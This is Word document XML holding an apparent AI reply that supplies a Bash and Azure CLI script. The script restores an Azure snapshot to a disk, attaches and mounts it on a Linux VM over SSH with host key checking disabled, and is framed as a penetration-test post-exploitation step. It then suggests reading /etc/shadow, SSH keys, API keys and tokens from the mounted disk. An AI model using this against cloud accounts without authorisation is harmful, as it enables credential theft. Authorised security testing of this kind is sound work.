    <w:p w14:paraId="4844559C" w14:textId="77777777" w:rsidR="0088453E" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0095227C" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">Great — here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fully automated script</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve"> to restore and mount a disk from an Azure snapshot onto a Linux VM, for use during a </w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>post-exploitation phase</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve"> of an Azure penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458963B" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="605B5D8D">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05885591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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated Azure Snapshot Restore &amp; Mount Script (Bash + Azure CLI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A474B8E" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A630B" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>Azure CLI logged in (az login) or SP creds (az login --service-principal ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0126A2BF" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>Permissions: Microsoft.Compute/disks/write, .../snapshots/read, .../virtualMachines/write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E35B4" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="2C20D419">
          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F1CB2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📜</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> restore_and_mount.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1CC9F4" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C880F" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="717C68EF" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:lastRenderedPageBreak/>
        <w:t># Usage: ./restore_and_mount.sh &lt;RESOURCE_GROUP&gt; &lt;SNAPSHOT_NAME&gt; &lt;TARGET_VM&gt; &lt;MOUNT_PATH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD28F96" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="44DB4396" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>RESOURCE_GROUP=$1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABCA005" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>SNAPSHOT_NAME=$2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2153A115" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>TARGET_VM=$3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20575E20" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>MOUNT_PATH=${4:-/mnt/restore}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C2ADA4" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="118C5961" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>DISK_NAME="restoredDisk-$(date +%s)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504D87D3" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="49607C39" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>echo "[*] Creating disk from snapshot..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A76FE" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>az disk create \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C03B168" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --resource-group "$RESOURCE_GROUP" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B9D965" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --name "$DISK_NAME" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D5BFD9" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --source "$SNAPSHOT_NAME" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2DBE9A" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --query "id" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5DA75" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="26CAA368" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>echo "[*] Attaching disk to VM: $TARGET_VM..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EB8BA5" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>az vm disk attach \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555921FD" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --resource-group "$RESOURCE_GROUP" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5779DA13" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --vm-name "$TARGET_VM" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AFEBB5" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --name "$DISK_NAME"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF272AC" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="6325E3F5" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>echo "[*] Waiting 20s for the disk to initialize..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7260A" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>sleep 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B2707" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="4BC4DF68" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>echo "[*] SSH into VM to mount disk..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABB6488" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="620CA7BF" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>PUBLIC_IP=$(az vm show -d -g "$RESOURCE_GROUP" -n "$TARGET_VM" --query publicIps -o tsv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C2B46" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>SSH_USER=$(az vm show -g "$RESOURCE_GROUP" -n "$TARGET_VM" --query 'osProfile.linuxConfiguration.adminUsername' -o tsv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E64CA97" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="4BBCB223" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t># SSH Commands to identify and mount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210AB3CC" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>SSH_CMDS=$(cat &lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A04CBC" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>set -e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AACA7E8" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>echo "[*] Listing available devices..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB2406D" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>lsblk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E8AF0" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="6F04DDE5" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>DEVICE=\$(lsblk -o NAME,MOUNTPOINT | grep -vE "boot|/" | grep -E '^sd|^xvd' | awk '{print "/dev/" \$1}' | tail -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C189B0" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>echo "[*] Found device: \$DEVICE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBE334" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="5FD8198E" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>echo "[*] Creating mount point: $MOUNT_PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00594A5C" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>sudo mkdir -p "$MOUNT_PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8662DE" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="4A8BC860" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:lastRenderedPageBreak/>
        <w:t>echo "[*] Mounting \$DEVICE to $MOUNT_PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92D820" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>sudo mount \$DEVICE "$MOUNT_PATH" || echo "[!] Mount failed — maybe no partition table?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A27E0" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="3C58BE14" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>echo "[*] Mounted volume:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3380C8ED" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>df -h "$MOUNT_PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA906C2" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>ls -lah "$MOUNT_PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6575386F" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D02F32F" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55382B63" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="66E56295" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>ssh -o StrictHostKeyChecking=no "$SSH_USER@$PUBLIC_IP" "$SSH_CMDS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0903E45F" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="02758FD0">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="755CB5C0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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Usage Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B56B28" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>chmod +x restore_and_mount.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADCA04B" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="0CFE3105" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>./restore_and_mount.sh myResourceGroup snap-01 myLinuxVM /mnt/snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB4E9B" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="731AD209">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF35637" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Post-Mount Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F67E0" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>Browse /mnt/snapshot/etc/shadow or /mnt/snapshot/home/azureuser/.ssh/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180EBCB" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>Recover configuration, API keys, tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E2A87C" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>Look for sensitive app data in /var/www/, /opt/, or /srv/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77665970" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="66F89B4E">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8206F7" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>Would you like the same capability written in PowerShell or Python for integration into your toolkit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1351ED27" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00215B80" w:rsidRDefault="0088453E" w:rsidP="0088453E"/>
    <w:p w14:paraId="0A37C66D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458"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="519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EA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEF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43049"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C5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41507"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E78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F3220"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8904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B257F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="787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E059A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="077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B21A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B91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435CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A54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C528A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A28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503E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CE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27E06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB0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22236"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30E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84535"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0D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E5D55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A46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2439C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF8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640AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="760C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873078"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39E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740DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="726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2D0DD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BD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790B29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8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939FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39A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3E76B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEA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3F253E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA4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10A0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB3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222718"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F43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9450E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8A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76417"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26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C2370"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56E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02390A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD1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0B2649"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF7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0F2970"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D58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B4531"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="518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E7C6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0D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1F6B94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B40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3B2073"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="185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587A46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22A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03997"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="103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E3564D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2452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B1C6B3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="175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28219D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="951C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B4E6678"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAC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6B3F80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CD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9D2834"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB9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D221D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CC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5556AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B74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723454"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="725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751C5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC9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535278"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C0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9F4593"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC9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0331D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1F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3700C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFF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41186F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BE2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451C26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="384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46386C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A7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02CD5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A6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110FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE6C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812512"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96D2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98078E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F97A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B7289D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="787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056441"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBE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294DE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="138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4A4E60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E22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5573BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C8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653891"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F2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D80198"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="808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182287"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3B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235037"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D8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97EF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="006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427312"/>
